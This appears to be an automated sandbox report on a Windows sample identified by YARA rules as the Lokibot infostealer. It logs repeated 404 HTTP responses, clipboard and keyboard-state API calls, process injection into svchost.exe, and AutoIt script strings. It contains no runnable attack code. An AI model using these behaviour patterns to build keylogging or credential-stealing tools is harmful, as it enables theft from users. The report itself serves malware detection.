Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EFOLEhZRdwSx4fbeYvEdFmEnSRspKVGtKSXZoyHjHW2WJXVk4ZBxK09wgrZqpsUavWQvs3fRwx2BezJV0oMTOqru%2F0J5jatPFCpmSO85hSKMGhk48cKWo7WvM4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178705bdb3c4387-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=98&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMYoMJs9S52ya6%2Fx%2FcSg6If3ofh9qbp5YvA%2BHCZ4UI%2BaFXq2CGi0XVv8rcTNyB%2FbchJQXRIe%2FleRg%2B3QBtgDk5YvbJOvk8H9tBhbbIPpqXxoawSpE7HC82ENZPA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91787067d9b642dc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85Hm%2BTZIyd8P6EPbHFaVZ%2B5qyLnJRuCqSRy4PXqTsMY2PRdJn8nAEWUqRKgbezLZWUD3CLa31KwGfJsN5Y2jtUM3fXN%2F2r4FXetYgBdb8Ay8cXg3IkKA6rj4m18%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91787074abc70f60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=34860&min_rtt=34860&rtt_var=17430&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDPZyNjX%2BQ%2BUufFYIDh8tQutmNI6g6AmYmJobfuN8Pw5iOgpUZrX%2FbbC74hXgfoH7DdVa4Q64nBC1MNiJY6w1VdS5fcIKjTfkQ5%2BCRV%2BAMjuS7%2Fyjv%2Fj7f%2BJckQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178708cfbfc4291-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9t6rnYawWknGKX3doMYVdSITeYXbm%2BF%2F3AOEYcUEwCw38twyvKfQGuDrx%2B0kFSDIfm20jNvY%2FHEhoNUVKupo4z53Uia%2BrCYVdfmc9r9l68yAzXbGNKErw1BJWA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917870a54bb48c95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2275&min_rtt=2275&rtt_var=1137&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKBwXjny1g6nMaU1805Ew4ZEIO75POJNNcfl7nzK6tjXBcPKP84kLx8EbFEPEGJNodpWvyGHunUkom%2BZXZJXuAHEsVig7wKBNm2mGYq9v0l3Eb83UUDchoa5Hhk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917870c9d82f41f3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BkHC9ymgD7PFhoWljgVpZuth%2F%2BXtVboOvovo18OiTdXD5FRpe4B5CjlcldydZV9iAusEqjoAJ7SHzsTu0hJLYaTqWSBUet%2FjPzbggaTDHs0kqUrKtE%2BsZwxyo0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917870d5ff7142d0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1614&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OG6hkrg9gcDPK7NOGwlLgOAHaQ91TN4QlicSIwRCTPi%2BpGWr%2BQLXYuiuyT8mVk3CLZsZHnG0%2BibGgD2fRlxPSnBU88DBZJyl%2BvJsqZzTaTknb7po3kbV3J0pOc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917870e19978f799-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0WinGJxhrAqgiU5pk%2BP4pNFDkfsh9T8XwWsrVLXTM%2BNIfmwMmzsQRiBaWtq%2BZloSEoFQZeh%2B%2FICdostazQA9%2BKAVpe2abj3rmy1OUMSyXgxXl1Qmldry2YUeD4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917870edbeaac472-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WEc35BgyXuN6pjV1foo57isbPFnY6OmPtjM3FsT7hgbrGfabBQTSfC6DF%2B4dbyBI6bRHKJr8Y6j6GeiJ%2FuukOfHuBI6zUDIovsElk6BFjHUwPN92OLemjK4xY%2BE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917870f9dd7a8c48-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGMxuaXTTDPLYYDL9eFWdhIVRWnjrfRHNFgebOAKYmzOyNkZNH5TOfLoUolx12M38HvChVUXuhdmyJltiVDK1YWSIwvfOXWjfTuDZcbp79g3eCdsGXXT865FHGk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91787105ef0f32d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1958&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnmyJseMkXtu1npFE7pCeJ3uNDkwG5Dlq4EuBWtXhjxAq%2BFlqCN5vAKwK0e%2BKFzzBC83L8VonKAek2uk4taS5FS2LU6xn9LGWa5PeVZW3KcFCT4fYZQHVrmNN7Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 917871124aed4257-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:38:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKHPmn0%2BmBghlu5mQqdfF8CgSyq1%2FbHcfHWemepHVeqzF7gQzhOj2cpvmNldlK%2FQDu9Ym3QFGzph39rG1IuaO7eJ2r%2FsgziVr%2BCnc4YDJ9S7Y9hCo4PABFRDeLE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178712a9b010f68-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:39:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cwdGmKStxNvNQDzVw1icNJK%2F4ntxojb2FD8BOE4bHkBPZiRDx1KzKJxcOcDb0XKpxj6rOG1YZfkMPDjyEI2sbBtM56VOFFnZXzH599WjwlGNtArzRxRbo%2FCERLo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91787142bd4bf799-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:39:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n86%2BaImh1xL2YICyCDlePZa%2FSLKU9UifPj4uDiyIPz1ZU3f86KfszdhBEUr64G2ppVNK3YUwg3RhCS5EHiDHIcL%2BGqWzc%2Bc8hJkpaIgBSIL3qHq7UxYOxGNuxbg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178714fbd54558a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2711&min_rtt=2711&rtt_var=1355&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:39:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uPvlrBFEtygqg8GtvS8aPJRZ7vUlPiH88Q39nTIZBQCKTVva8tI5I2jVLFljQ95O1jj12yuVNEc3CP0QXgiCpMHZiqkuxWlihU3i54tPjR66kRbR6D7Mn2C2ck%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9178715bebb842dc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C44164

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C44164

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C43F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C43F66

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C3001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C3001C

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C5CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00C5CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PRI_VTK250419A.exe.1120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PRI_VTK250419A.exe.1120000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: PRI_VTK250419A.exe PID: 7140, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3868, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00BD3B3A
Source: PRI_VTK250419A.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PRI_VTK250419A.exe, 00000000.00000000.2047725999.0000000000C84000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9c0faae5-8
Source: PRI_VTK250419A.exe, 00000000.00000000.2047725999.0000000000C84000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_400e747b-6
Source: PRI_VTK250419A.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ab3ae169-9
Source: PRI_VTK250419A.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_ed847961-a

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00192720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	2_2_00192720
